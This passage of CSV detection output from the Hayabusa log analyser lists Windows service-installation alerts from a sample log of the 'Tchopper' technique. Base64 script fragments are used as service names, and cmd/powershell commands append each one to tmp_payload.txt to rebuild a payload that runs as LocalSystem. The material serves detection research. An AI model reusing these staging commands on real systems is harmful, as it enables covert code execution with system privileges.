c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 